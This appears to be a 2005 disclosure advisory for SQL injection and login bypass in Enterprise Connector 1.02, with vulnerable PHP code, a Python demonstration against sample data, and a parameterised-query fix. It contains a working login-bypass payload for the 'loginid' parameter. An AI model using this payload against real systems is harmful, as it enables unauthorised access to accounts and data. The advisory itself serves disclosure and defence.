Enterprise Connector v.1.02 Multiple SQL Vulnerabilities and Login Bypass
Author: Attila Gerendi (Darkz)
Date: December 20, 2005
Package: Enterprise Connector (http://www.enterpriseheart.com/site/modules/mydownloads/)
Versions Affected: 1.02 (Other versions may also be affected.)
Severity: SQL Injection, Login Bypass
Description:
Some of these SQL injection vulnerabilities were already reported at:
http://secunia.com/advisories/17743/
A new SQL injection vulnerability not listed in that report:
Input passed to the "loginid" parameter of "main.php" is not properly sanitised before being used in
a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and to
bypass the login sequence.
Login Bypass Example:
username 'or isnull(1/0) /*
password (no password required)
or just simply call main.php with the POST parameter loginid='or isnull(1/0) /*
With that value the WHERE clause of the query becomes:
userid = ''or isnull(1/0) /*'  AND password = ''
In MySQL 1/0 evaluates to NULL, so isnull(1/0) is true for every row, and the trailing /* comments out the
rest of the statement, including the password check; every row of connector_user matches and the login
succeeds without a password.
Vulnerable code piece (main.php; both POST parameters are concatenated straight into the query):
$sql = "SELECT userid, companyid, departmentid, status, languagefile FROM connector_user WHERE ";
$sql .= "userid = '" . $_POST['loginid'] . "' ";         // loginid: unescaped, a quote in it closes the literal
$sql .= " AND password = '" . $_POST['password'] . "'";  // password: also unescaped
$result = sql_execute($sql);
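To make the effect of that concatenation concrete, the following is an added Python example, not code from the advisory or from Enterprise Connector. It rebuilds the same query string, runs it against an in-memory SQLite table of constructed sample users, and compares it with a parameterised query. The advisory's payload uses MySQL's isnull(1/0); SQLite has no isnull() function (ISNULL is a postfix operator there), so the example also carries the equivalent form ' or 1/0 is null /*, which relies on the same two behaviours: division by zero yields NULL, and an unterminated /* comments out the rest of the statement. The table contents, the row values and the helper names are assumptions made for this example.

```python
import sqlite3

# Constructed sample rows for connector_user; the column names are the ones used in
# the advisory's query, the values are assumptions for this example.
SAMPLE_USERS = [
    ("admin", 1, 1, "active", "english.php", "s3cret"),
    ("jdoe",  1, 2, "active", "english.php", "hunter2"),
]

# The advisory's payload, verbatim. isnull() is a MySQL function; in SQLite ISNULL
# is a postfix operator, so this exact string is a syntax error there.
MYSQL_PAYLOAD = "'or isnull(1/0) /*"

# Same technique in portable SQL: close the userid literal, append a condition that
# is always true because 1/0 yields NULL, and comment out the password check.
SQLITE_PAYLOAD = "'or 1/0 is null /*"


def make_db():
    """In-memory SQLite stand-in for the Enterprise Connector database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE connector_user (userid TEXT, companyid INTEGER, "
        "departmentid INTEGER, status TEXT, languagefile TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO connector_user VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_sql(loginid, password):
    """Same string concatenation as main.php: untrusted input goes straight into the query."""
    sql = "SELECT userid, companyid, departmentid, status, languagefile FROM connector_user WHERE "
    sql += "userid = '" + loginid + "' "
    sql += " AND password = '" + password + "'"
    return sql


def vulnerable_login(conn, loginid, password):
    """Runs the concatenated query and returns the matching rows (the sql_execute stand-in)."""
    return conn.execute(build_vulnerable_sql(loginid, password)).fetchall()


def query_accepted(conn, loginid, password):
    """True if the database parses and runs the concatenated query, False on a SQL error.
    Shows that an injection payload is dialect-specific: the MySQL form fails on SQLite."""
    try:
        vulnerable_login(conn, loginid, password)
        return True
    except sqlite3.OperationalError:
        return False


def safe_login(conn, loginid, password):
    """Parameterised version: the driver binds the values, so the quote in the
    payload is just a character inside a string that matches no userid."""
    sql = (
        "SELECT userid, companyid, departmentid, status, languagefile "
        "FROM connector_user WHERE userid = ? AND password = ?"
    )
    return conn.execute(sql, (loginid, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_sql(SQLITE_PAYLOAD, ""))
    print("vulnerable, bypass payload:", vulnerable_login(db, SQLITE_PAYLOAD, ""))
    print("vulnerable, MySQL payload accepted by SQLite:", query_accepted(db, MYSQL_PAYLOAD, ""))
    print("safe, bypass payload:      ", safe_login(db, SQLITE_PAYLOAD, ""))
    print("safe, valid credentials:   ", safe_login(db, "admin", "s3cret"))
```

A legitimate login still works through the vulnerable path, which is why the bug goes unnoticed in normal use; the parameterised version rejects the payload because the quote is bound as data rather than parsed as SQL. Escaping with the database's escaping function would also close this particular hole, but binding is the fix that does not depend on getting the escaping right at every query in the code base.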
There may be further SQL injection vulnerabilities in the package.
The package author was contacted via the home page's "contact us" module on December 8, 2005; no response was received.
Solution:
Enterprise Connector development appears to be suspended; no release has appeared since 2004/4/27.
You may edit the source code to ensure that input is properly sanitised before it reaches a query, e.g. by
escaping the POST values with the database's escaping function (mysql_real_escape_string() for MySQL) or by
using parameterised queries.